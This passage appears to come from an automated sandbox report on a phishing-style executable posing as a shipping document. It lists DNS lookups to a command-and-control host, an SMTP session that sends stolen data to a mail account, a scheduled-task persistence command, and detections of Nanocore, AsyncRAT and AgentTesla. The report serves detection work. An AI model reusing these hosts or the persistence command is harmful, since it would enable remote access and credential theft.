                                                                                                                    Dec 3, 2020 09:32:30.446818113 CET53588238.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:35.584728003 CET5756853192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:35.857040882 CET53575688.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:39.679889917 CET5054053192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:39.715394020 CET53505408.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:41.620759010 CET5436653192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:41.648091078 CET53543668.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:42.002161980 CET5303453192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:42.037940025 CET53530348.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:49.804671049 CET5776253192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:49.831701040 CET53577628.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:54.726667881 CET5543553192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:54.986386061 CET53554358.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:56.548016071 CET5071353192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:56.567727089 CET5613253192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:56.626704931 CET53507138.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:56.640607119 CET5898753192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:56.840656042 CET53561328.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:56.850773096 CET53589878.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:33:12.045288086 CET5657953192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:33:12.318238020 CET53565798.8.8.8192.168.2.3

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                    Dec 3, 2020 09:31:20.564963102 CET192.168.2.38.8.8.80x6798Standard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:31:37.422287941 CET192.168.2.38.8.8.80x3563Standard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:31:42.682965994 CET192.168.2.38.8.8.80xe3b3Standard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:01.058284998 CET192.168.2.38.8.8.80x40dbStandard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:03.798532009 CET192.168.2.38.8.8.80x8985Standard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:18.332866907 CET192.168.2.38.8.8.80x14b7Standard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:30.188091040 CET192.168.2.38.8.8.80x132eStandard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:35.584728003 CET192.168.2.38.8.8.80x437fStandard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:54.726667881 CET192.168.2.38.8.8.80xac3aStandard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:56.548016071 CET192.168.2.38.8.8.80xe037Standard query (0)mail.flood-protection.orgA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:56.567727089 CET192.168.2.38.8.8.80x23c3Standard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:56.640607119 CET192.168.2.38.8.8.80x85ccStandard query (0)mail.flood-protection.orgA (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:33:12.045288086 CET192.168.2.38.8.8.80x314aStandard query (0)centurygift.myq-see.comA (IP address)IN (0x0001)

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                    Dec 3, 2020 09:31:20.836836100 CET8.8.8.8192.168.2.30x6798No error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:31:37.681651115 CET8.8.8.8192.168.2.30x3563No error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:31:42.943188906 CET8.8.8.8192.168.2.30xe3b3No error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:01.317799091 CET8.8.8.8192.168.2.30x40dbNo error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:04.072484016 CET8.8.8.8192.168.2.30x8985No error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:18.592967987 CET8.8.8.8192.168.2.30x14b7No error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:30.446818113 CET8.8.8.8192.168.2.30x132eNo error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:35.857040882 CET8.8.8.8192.168.2.30x437fNo error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:54.986386061 CET8.8.8.8192.168.2.30xac3aNo error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:56.626704931 CET8.8.8.8192.168.2.30xe037No error (0)mail.flood-protection.orgflood-protection.orgCNAME (Canonical name)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:56.626704931 CET8.8.8.8192.168.2.30xe037No error (0)flood-protection.org85.187.154.178A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:56.840656042 CET8.8.8.8192.168.2.30x23c3No error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:56.850773096 CET8.8.8.8192.168.2.30x85ccNo error (0)mail.flood-protection.orgflood-protection.orgCNAME (Canonical name)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:32:56.850773096 CET8.8.8.8192.168.2.30x85ccNo error (0)flood-protection.org85.187.154.178A (IP address)IN (0x0001)
                                                                                                                    Dec 3, 2020 09:33:12.318238020 CET8.8.8.8192.168.2.30x314aNo error (0)centurygift.myq-see.com172.94.25.202A (IP address)IN (0x0001)

                                                                                                                    SMTP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                    Dec 3, 2020 09:32:57.059776068 CET5874973985.187.154.178192.168.2.3220-nl1-ss12.a2hosting.com ESMTP Exim 4.93 #2 Thu, 03 Dec 2020 09:32:57 +0100
                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                    220 and/or bulk e-mail.
                                                                                                                    Dec 3, 2020 09:32:57.060077906 CET49739587192.168.2.385.187.154.178EHLO 093954
                                                                                                                    Dec 3, 2020 09:32:57.096456051 CET5874973985.187.154.178192.168.2.3250-nl1-ss12.a2hosting.com Hello 093954 [84.17.52.25]
                                                                                                                    250-SIZE 52428800
                                                                                                                    250-8BITMIME
                                                                                                                    250-PIPELINING
                                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                                    250-STARTTLS
                                                                                                                    250 HELP
                                                                                                                    Dec 3, 2020 09:32:57.097995996 CET49739587192.168.2.385.187.154.178AUTH login c2VudEBmbG9vZC1wcm90ZWN0aW9uLm9yZw==
                                                                                                                    Dec 3, 2020 09:32:57.134474993 CET5874973985.187.154.178192.168.2.3334 UGFzc3dvcmQ6
                                                                                                                    Dec 3, 2020 09:32:57.178388119 CET5874973985.187.154.178192.168.2.3235 Authentication succeeded
                                                                                                                    Dec 3, 2020 09:32:57.203146935 CET49739587192.168.2.385.187.154.178MAIL FROM:<sent@flood-protection.org>
                                                                                                                    Dec 3, 2020 09:32:57.239535093 CET5874973985.187.154.178192.168.2.3250 OK
                                                                                                                    Dec 3, 2020 09:32:57.239850998 CET49739587192.168.2.385.187.154.178RCPT TO:<mebarth@flood-protection.org>
                                                                                                                    Dec 3, 2020 09:32:57.287650108 CET5874973985.187.154.178192.168.2.3250 Accepted
                                                                                                                    Dec 3, 2020 09:32:57.287950993 CET49739587192.168.2.385.187.154.178DATA
                                                                                                                    Dec 3, 2020 09:32:57.324232101 CET5874973985.187.154.178192.168.2.3354 Enter message, ending with "." on a line by itself
                                                                                                                    Dec 3, 2020 09:32:57.328385115 CET49739587192.168.2.385.187.154.178.
                                                                                                                    Dec 3, 2020 09:32:57.367136002 CET5874973985.187.154.178192.168.2.3250 OK id=1kkk2r-0000fT-9t

                                                                                                                    Code Manipulations

                                                                                                                    Statistics

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Start time:09:31:07
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:'C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe'
                                                                                                                    Imagebase:0xba0000
                                                                                                                    File size:700416 bytes
                                                                                                                    MD5 hash:B70FFEB2BABBACB28B22411BECCB4642
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    Reputation:low

                                                                                                                    General

                                                                                                                    Start time:09:31:15
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:{path}
                                                                                                                    Imagebase:0xc70000
                                                                                                                    File size:700416 bytes
                                                                                                                    MD5 hash:B70FFEB2BABBACB28B22411BECCB4642
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    Reputation:low

                                                                                                                    General

                                                                                                                    Start time:09:31:17
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe'
                                                                                                                    Imagebase:0xc00000
                                                                                                                    File size:128000 bytes
                                                                                                                    MD5 hash:01475371C9519A0C8F64B7606A0833E0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.245444705.0000000012EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                                    Reputation:low

                                                                                                                    General

                                                                                                                    Start time:09:31:18
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Icda.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\Icda.exe'
                                                                                                                    Imagebase:0xa40000
                                                                                                                    File size:207360 bytes
                                                                                                                    MD5 hash:BB21F995740D8BC1549D9CBC32874DD8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Florian Roth
                                                                                                                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Florian Roth
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 94%, ReversingLabs
                                                                                                                    Reputation:low

                                                                                                                    General

                                                                                                                    Start time:09:31:20
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Isgeprf.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\Isgeprf.exe'
                                                                                                                    Imagebase:0x710000
                                                                                                                    File size:46080 bytes
                                                                                                                    MD5 hash:E2DA4F42475E01F7961EF2FB929DE54E
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.263102745.0000000000712000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 86%, ReversingLabs
                                                                                                                    Reputation:low

                                                                                                                    General

                                                                                                                    Start time:09:31:20
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe'
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:219648 bytes
                                                                                                                    MD5 hash:E8DC83A4ED7657D3211077B7F343FC3C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.483921714.00000000004E2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 67%, ReversingLabs
                                                                                                                    Reputation:low

                                                                                                                    General

                                                                                                                    Start time:09:31:29
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' & exit
                                                                                                                    Imagebase:0xbd0000
                                                                                                                    File size:232960 bytes
                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Start time:09:31:29
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                    File size:625664 bytes
                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Start time:09:31:29
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat''
                                                                                                                    Imagebase:0xbd0000
                                                                                                                    File size:232960 bytes
                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Start time:09:31:29
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                    File size:625664 bytes
                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Start time:09:31:30
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe''
                                                                                                                    Imagebase:0x970000
                                                                                                                    File size:185856 bytes
                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Start time:09:31:30
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:timeout 3
                                                                                                                    Imagebase:0xc50000
                                                                                                                    File size:26112 bytes
                                                                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Start time:09:31:31
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\VLC2.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\VLC2.exe
                                                                                                                    Imagebase:0x900000
                                                                                                                    File size:46080 bytes
                                                                                                                    MD5 hash:E2DA4F42475E01F7961EF2FB929DE54E
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.266244520.0000000000902000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\VLC2.exe, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 86%, ReversingLabs
                                                                                                                    Reputation:low

                                                                                                                    General

                                                                                                                    Start time:09:31:33
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\VLC2.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\VLC2.exe'
                                                                                                                    Imagebase:0xa0000
                                                                                                                    File size:46080 bytes
                                                                                                                    MD5 hash:E2DA4F42475E01F7961EF2FB929DE54E
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000010.00000002.283204276.00000000000A2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    Reputation:low

                                                                                                                    General

                                                                                                                    Start time:09:31:34
                                                                                                                    Start date:03/12/2020
                                                                                                                    Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                                                                                    Imagebase:0xc80000
                                                                                                                    File size:207360 bytes
                                                                                                                    MD5 hash:BB21F995740D8BC1549D9CBC32874DD8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                                                                                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 94%, ReversingLabs
                                                                                                                    Reputation:low

                                                                                                                    Disassembly

                                                                                                                    Code Analysis

                                                                                                                    Reset < >